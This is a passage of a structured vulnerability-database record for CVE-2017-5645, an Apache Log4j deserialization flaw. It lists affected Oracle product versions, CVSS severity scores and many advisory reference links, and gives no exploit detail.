matchCriteriaId: "4424C7C9-508B-4824-91A7-AFA1D8C8C698", versionEndIncluding: "4.0.4.5235", versionStartIncluding: "4.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:mysql_enterprise_monitor:*:*:*:*:*:*:*:*", matchCriteriaId: "BFFFF50D-D301-4752-B720-4340C69E2A98", versionEndIncluding: "8.0.0.8131", versionStartIncluding: "8.0.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_install:9.2:*:*:*:*:*:*:*", matchCriteriaId: "B21E71BD-DD38-4634-BF9F-092D55000DE6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:*", matchCriteriaId: "9D8B3B57-73D6-4402-987F-8AE723D52F94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "62BF043E-BCB9-433D-BA09-7357853EE127", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:*", matchCriteriaId: "3F26FB80-F541-4B59-AC3C-633F49388B59", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.0:*:*:*:*:*:*:*", matchCriteriaId: "07EB8080-B6DE-47F4-B978-F56AEF7294BE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.1:*:*:*:*:*:*:*", matchCriteriaId: "0AE52320-14DB-4BD5-A1E5-6BBE4829923A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.2:*:*:*:*:*:*:*", matchCriteriaId: "2C0B5E4B-BA35-4949-B7EC-70C5F5E44FD8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.3:*:*:*:*:*:*:*", matchCriteriaId: "165E98B6-9ADA-46A7-92C0-E3624D6D89C5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.4:*:*:*:*:*:*:*", matchCriteriaId: "092C9E61-8A0A-4348-A423-A9312D7D330F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.5:*:*:*:*:*:*:*", matchCriteriaId: "01949739-F799-47FE-9118-617F84903F70", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.6:*:*:*:*:*:*:*", matchCriteriaId: "34FAA06A-F092-452A-B35C-BC133834DA59", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.7:*:*:*:*:*:*:*", matchCriteriaId: "B8A9A0D5-95B9-47BB-8303-03D40DE46678", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.8:*:*:*:*:*:*:*", matchCriteriaId: "F071925B-7B0A-4250-9A25-1221711453FF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.9:*:*:*:*:*:*:*", matchCriteriaId: "93CF9B92-309E-4356-B8C1-CB161A712479", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.2.10:*:*:*:*:*:*:*", matchCriteriaId: "2CBCA717-6B8B-4CAF-8E9C-57335925CE2F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*", matchCriteriaId: "0DB5E2C7-9C68-4D3B-95AD-9CBF65DE1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:10.4.7:*:*:*:*:*:*:*", matchCriteriaId: "8FFEC4A8-E000-4921-8563-5BC3B0DC6C5B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "DDB7DE72-2E0D-427D-AF1E-2BC068D0756B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.1.1:*:*:*:*:*:*:*", matchCriteriaId: "4C64A19B-BC3D-4C84-AE38-75EEAE3B5BEA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.0:*:*:*:*:*:*:*", matchCriteriaId: "5825956B-B0DD-4083-8E50-B8148F9F438E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.1:*:*:*:*:*:*:*", matchCriteriaId: "691A45D3-A594-4E95-9894-87B9FD6BE833", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.2:*:*:*:*:*:*:*", matchCriteriaId: "2F36C640-592C-4081-8B97-2432BF7DD1F6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.3:*:*:*:*:*:*:*", matchCriteriaId: "C477753B-2716-4266-815B-5BABDDFE1FDA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.4:*:*:*:*:*:*:*", matchCriteriaId: "9F94F4C7-8E3E-4D0E-A5E7-E8D4E2D21D6D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.5:*:*:*:*:*:*:*", matchCriteriaId: "CBCF09A6-8A57-40F4-9EB3-48F4806B4803", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.6:*:*:*:*:*:*:*", matchCriteriaId: "CBBE93A9-5628-4176-866E-88DE10B9778D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.7:*:*:*:*:*:*:*", matchCriteriaId: "FDB71361-D75B-4937-A48E-C2C0064E09FB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.8:*:*:*:*:*:*:*", matchCriteriaId: "FEB68145-0577-472D-B310-A7BF065ADA9E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.9:*:*:*:*:*:*:*", matchCriteriaId: "56961578-6FCB-489C-8431-22F9D263DFFA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.10:*:*:*:*:*:*:*", matchCriteriaId: "93EA52BF-E710-4309-9272-8F81D5751ABA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "06CF27F6-ADC1-480C-9D2E-2BD1E7330C32", versionEndIncluding: "16.2.11", versionStartIncluding: "16.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "E4AA3854-C9FD-4287-85A0-EE7907D1E1ED", versionEndIncluding: "17.12.7", versionStartIncluding: "17.12.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rapid_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "19A0F1AF-F2E6-44E7-8E2D-190E103B72D3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rapid_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "6D53690D-3390-4A27-988A-709CD89DD05B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_advanced_inventory_planning:14.0:*:*:*:*:*:*:*", matchCriteriaId: "A25285DC-9E51-44F8-818A-86A79B3565DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_advanced_inventory_planning:15.0:*:*:*:*:*:*:*", matchCriteriaId: "517E0654-F1DE-43C4-90B5-FB90CA31734B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_clearance_optimization_engine:14.0.5:*:*:*:*:*:*:*", matchCriteriaId: "FE91D517-D85D-4A8D-90DC-4561BBF8670E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.0:*:*:*:*:*:*:*", matchCriteriaId: "202DE5CB-B3D4-4289-9AA2-24E9CE266EE3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.1:*:*:*:*:*:*:*", matchCriteriaId: "2F7D07CB-15D2-424D-8E25-7AC59ACFFD05", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.2:*:*:*:*:*:*:*", matchCriteriaId: "AE02A69E-F820-4261-8D7E-9B1021E5A9AB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:19.0:*:*:*:*:*:*:*", matchCriteriaId: "4E306B67-E1BD-4A67-A77D-A7DC72D5B957", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:14.0.0:*:*:*:*:*:*:*", matchCriteriaId: "CB5F56EC-8415-4BA1-9D8A-C77F4BB1AF62", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:14.1.0:*:*:*:*:*:*:*", matchCriteriaId: "965BCB93-2DED-41FD-972E-FF5958691A35", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", matchCriteriaId: "42064F46-3012-4FB1-89BA-F13C2E4CBB6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*", matchCriteriaId: "F73E2EFA-0F43-4D92-8C7D-9E66811B76D6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_open_commerce_platform:5.3.0:*:*:*:*:*:*:*", matchCriteriaId: "07630491-0624-4C5C-A858-C5D3CDCD1B68", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EC9CA11F-F718-43E5-ADB9-6C348C75E37A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.1:*:*:*:*:*:*:*", matchCriteriaId: "9FBAAD32-1E9D-47F1-9F47-76FEA47EF54F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3:*:*:*:*:*:*:*", matchCriteriaId: "24A3C819-5151-4543-A5C6-998C9387C8A2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*", matchCriteriaId: "378A6656-252B-4929-83EA-BC107FDFD357", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*", matchCriteriaId: "363395FA-C296-4B2B-9D6F-BCB8DBE6FACE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*", matchCriteriaId: "F62A2144-5EF8-4319-B8C2-D7975F51E5FA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:18.7:*:*:*:*:*:*:*", matchCriteriaId: "EBAE649F-0389-4875-A995-E73E287AB342", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:18.8:*:*:*:*:*:*:*", matchCriteriaId: "9D5EC241-7D11-47F4-8B41-D362651A5E8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:18.9:*:*:*:*:*:*:*", matchCriteriaId: "8FCB6791-EBFA-4620-ABD4-D55CDCF3EA9D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:soa_suite:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "AF4C318C-5D1E-479B-9597-9FAD9E186111", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:soa_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "65994DC4-C9C0-48B0-88AB-E2958B4EB9E3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:soa_suite:12.2.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "4580A7AB-54A9-4784-9087-A3F107258593", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tape_library_acsls:8.4:*:*:*:*:*:*:*", matchCriteriaId: "70D4467D-6968-4557-AF61-AFD42B2B48D3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:timesten_in-memory_database:11.2.2.8.49:*:*:*:*:*:*:*", matchCriteriaId: "F9EB3DE5-142C-43A5-9735-CB73C54D42E4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_advanced_spatial_and_operational_analytics:2.7.0.1:*:*:*:*:*:*:*", matchCriteriaId: "6FD0EC40-B96B-4E9C-9A81-4E65C4B9512E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_work_and_asset_management:1.9.1.2.12:*:*:*:*:*:*:*", matchCriteriaId: "BB1011D4-E5EE-4722-B644-D522EFC6337A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B40B13B7-68B3-4510-968C-6A730EB46462", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "C93CC705-1F8C-4870-99E6-14BF264C3811", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.", }, { lang: "es", value: "En Apache Log4j 2.x en versiones anteriores a 2.8.2, cuando se utiliza el servidor de socket TCP o el servidor de socket UDP para recibir sucesos de registro serializados de otra aplicación, puede enviarse una carga binaria especialmente diseñada que, cuando se deserializa, puede ejecutar código arbitrario.", }, ], id: "CVE-2017-5645", lastModified: "2025-04-20T01:37:25.860", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2017-04-17T21:59:00.373", references: [ { source: "security@apache.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { source: "security@apache.org", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { source: "security@apache.org", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "security@apache.org", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/97702", }, { source: "security@apache.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040200", }, { source: "security@apache.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1041294", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1417", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1801", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1802", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2423", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2633", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2635", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2636", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2637", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2638", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2808", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2809", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2810", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2811", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2888", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2889", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3244", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3399", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3400", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1545", }, { source: "security@apache.org", tags: [ "Issue Tracking", "Vendor Advisory", ], url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9%40%3Cdev.logging.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917%40%3Cannounce.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc%40%3Cdev.logging.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3Cdev.logging.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287%40%3Cissues.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83%40%3Cgithub.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f%40%3Cgithub.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd%40%3Cgithub.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d%40%3Ccommits.logging.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8%40%3Cgithub.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422%40%3Ccommits.doris.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44%40%3Cgithub.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/97702", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040200", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1041294", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1417", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1801", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1802", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2423", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2633", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2635", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2636", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: 